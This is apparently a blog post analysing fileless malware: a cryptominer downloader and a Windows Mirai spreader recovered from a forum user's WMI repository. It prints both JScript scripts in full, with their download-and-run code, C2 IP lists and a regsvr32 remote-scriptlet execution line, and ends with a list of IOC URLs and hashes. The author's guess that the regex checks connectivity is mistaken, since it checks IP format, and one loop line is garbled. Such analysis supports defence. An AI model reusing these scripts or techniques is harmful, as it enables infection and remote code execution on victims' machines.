Fileless Malware: Cryptominer and Mirai via WMI

Today, I picked up a thread on the Malwarebytes Forums, where a user reported to be infected with a malware, detected as Hijack.BitCoinMiner.WMI by Malwarebytes that would always comeback on restart. The user reported that the detection was coming from the WMI repository, a technique often used by fileless malware to gain persistence on the system, and by harder to detect by some security product. In that case, the user was able to extract the content of the malicious WMI entry, and give me the two scripts that were being run on his system. After a quick analysis, I was able to find out that these scripts are used to spread a Bitcoin Miner (1st script), and a Windows variant of Mirai (2nd script). A more in-depth analysis of the second script can be found on both Kaspersky and Trend Micro’s blogs.

https://securelist.com/newish-mirai-spreader-poses-new-risks/77621/
http://newsroom.trendmicro.com/blog/security-intelligence/cryptocurrency-miner-uses-wmi-and-eternalblue-spread-filelessly

So, here’s the 1st script.

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg", 0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe", 2);
var r = new ActiveXObject("WScript.Shell.1");
r.Run("C:\\\\WINDOWS\\\\ps.exe");

Sadly, at the time of the writing, it looks like the website was down, and I couldn’t access the file. Though my guess is that the psa.jpg file is in fact a PE, and a Cryptominer.
As for the 2nd script, here it is.

var toff = 3000;
var fso = new ActiveXObject("Scripting.FilesystemObject");
var http = new ActiveXObject("Msxml2.ServerXMLHTTP");
if (!fso.FileExists('wpd.xml')) {
var f = fso.CreateTextFile('wpd.xml', 2);
f.writeLine('54.255.141.50' + '\r\n' + '78.142.29.152' + '\r\n' + '74.222.14.61' + '\r\n' + '70.39.124.66');
f.Close();
}
var f = fso.OpenTextFile('wpd.xml', 1);
var txt = f.ReadAll().replace(/^\s*|\s*$/g, '').split(/[\r\n]+/);
f.close();
txt.sort(function() {
return Math.random() > 0.5 ? -1 : 1;
});
var ip = txt[0].replace(/^\s*|\s*$/g, '');
var wsh = new ActiveXObject("WScript.Shell");
var locator = new ActiveXObject("WbemScripting.SWbemLocator");
var service = locator.ConnectServer(".", "root/cimv2");
var colItems = service.ExecQuery("select * from Win32_Process");
var e = new Enumerator(colItems);
var t1 = new Date().valueOf();
for (; !e.atEnd(); e.moveNext()) {
var p = e.item();
if (p.Caption == "rundll32.exe") p.Terminate()
};
var t2 = 0;
while (t2 - t1 < toff) {
var t2 = new Date().valueOf()
}
var pp = service.get("Win32_Process");
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://" + ip + "/wpd/wpd.txt", 0);
x.Send();
var ado = new ActiveXObject("ADODB.Stream");
ado.Mode = 3;
ado.Type = 1;
ado.Open();
ado.Write(x.responseBody);
ado.SaveToFile("wpd1.xml", 2);
ado.Close();
var txtfile = fso.OpenTextFile('wpd1.xml', 1);
var result = txtfile.ReadAll().replace(/^\s*|\s*$/g, '').split(/[\r\n]+/);
txtfile.Close();
var flag = true;
for (var i = 0; i < result.length; i++) {
var tmpline = result[i].replace(/^\s*|\s*$/g, '');
if (!/^(?:(?:[1-9]|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])\.){3}(?:[1-9]|[1-9]\d|1\d\d|2[0-4]\d|25[0-5])$/.test(tmpline)) flag = false;
}
if (flag) fso.copyfile('wpd1.xml', 'wpd.xml', true);
var url1 = "http://" + ip + "/wpd/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i i; i++) t = arr[i].split(" ", 3), http.open("GET", t[0], !1), http.send(), ado.Type = 1, ado.Open(), ado.Write(http.responseBody), ado.SaveToFile(t[1], 2), ado.Close(), 1 == t[2] && wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");
pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");
pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");
pp.create("regsvr32 /u /s /i:http://" + ip + "/wpd/v.sct scrobj.dll");
pp.create("rundll32.exe c:\\windows\\debug\\items.dat,ServiceMain aaaa");

This script is almost an exact copy of the one you can see in Trend Micro’s analysis blog post, with a key difference. It’ll look for a file called wpd.xml, and it it doesn’t exist, it’ll create it, and write the following IP adresses in it.

54.255.141.50
78.142.29.152
74.222.14.61
70.39.124.66

It’ll then go through all of these IPs, looking for a file located at $IP_ADDRESS/wpd/wpd.txt to grab additional IP adresses:

54.255.141.50
78.142.29.152
74.222.14.61
70.39.124.66
103.213.246.23

You’ll notice that these are the same as the ones above, except for the addition of a new one, 103[.]213.246.23. It’ll then write all these IPs to a file called wpd1.xml, and go through a loop to test each of these IPs for a condition, and if not met, will set the flag variable to false. If the flag doesn’t get changed (stays at true), then the script will overwrite the wpd.xml file with the wpd1.xml. I’m still not proefficient enough when it comes to Regex to tell you exactly what the condition tested is, but from what I can see, and if I had to guess, I would say that this loop tests the connectivity to the IP adresses that were grabbed from the wpd.txt link, and if they are still online, it’ll replace the wpd.xml file with the wpd1.xml one, to make sure that the C2 it’s using are still alive.

Also, from the Kaspersky analysis, it seems that the IPs in the wpd.xml and wpd1.xml files also have files at the links below, but they aren’t used in the scripts (but are most likely used by the executables dropped on the system).

hxxp://67.229.99.82:8888/ver.txt - Content below
1.0.0.5
hxxp://67.229.99.82:8888/wpd.jpg - Taylor Swift .jpg
hxxp://67.229.99.82:8888/update.txt - Content below
hxxp://67.229.99.82:8888/wpd.jpg c:\windows\system\msinfo.exe
hxxp://67.229.99.82:8888/my1.html c:\windows\system\my1.bat
hxxp://67.229.99.82:8888/my1.html - Content is the same batch script as the one from Kaspersky's analysis, though the URL points to hxxp://js.mys2018.xyz:280/v.sct
hxxp://67.229.99.82:8888/wpdmd5.txt - Content below
4f16b32732d4ef49e68ad171717f575a
hxxp://67.229.99.82:8888/wpd.dat - File, cannot tell the content, not a PE

This was my first ever blogpost, so please forgive me if it’s incomplete, hard to read, or if it contains wrong information at all (nevermind the numerous typos and grammar mistakes). I’ll be more than happy to adjust it with your feedback, so please, don’t hesitate!

IOCs:

hxxp://54.255.141.50/wpd/wpd.txt - Content below
54.255.141.50
78.142.29.152
74.222.14.61
70.39.124.66
103.213.246.23
hxxp://78.142.29.152/wpd/wpd.txt
hxxp://74.222.14.61/wpd/wpd.txt
hxxp://70.39.124.66/wpd/wpd.txt
hxxp://54.255.141.50/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1
hxxp://78.142.29.152/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1 hxxp://74.222.14.61/v.rar c:\windows\temp\v.exe 1
hxxp://74.222.14.61/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1 hxxp://74.222.14.61/v.rar c:\windows\temp\v.exe 1
hxxp://70.39.124.66/wpd/test.html - Content below
hxxp://67.229.99.82:8888/ups.rar C:\windows\system\cab.exe 1 hxxp://74.222.14.61/v.rar c:\windows\temp\v.exe 1
hxxp://67.229.99.82:8888/ups.rar
hxxp://74.222.14.61/v.rar
v.rar: 1d1d243cc181bdd615be960559e6c6f94693a31d0224041313e21adbb381d632
https://www.virustotal.com/#/file/1d1d243cc181bdd615be960559e6c6f94693a31d0224041313e21adbb381d632/detection
ups.rar 353c696b9b0db39958bc18a51fcc3b879f9f143d261c4cd1a2e521d1b9f98992
https://www.virustotal.com/#/file/353c696b9b0db39958bc18a51fcc3b879f9f143d261c4cd1a2e521d1b9f98992/detection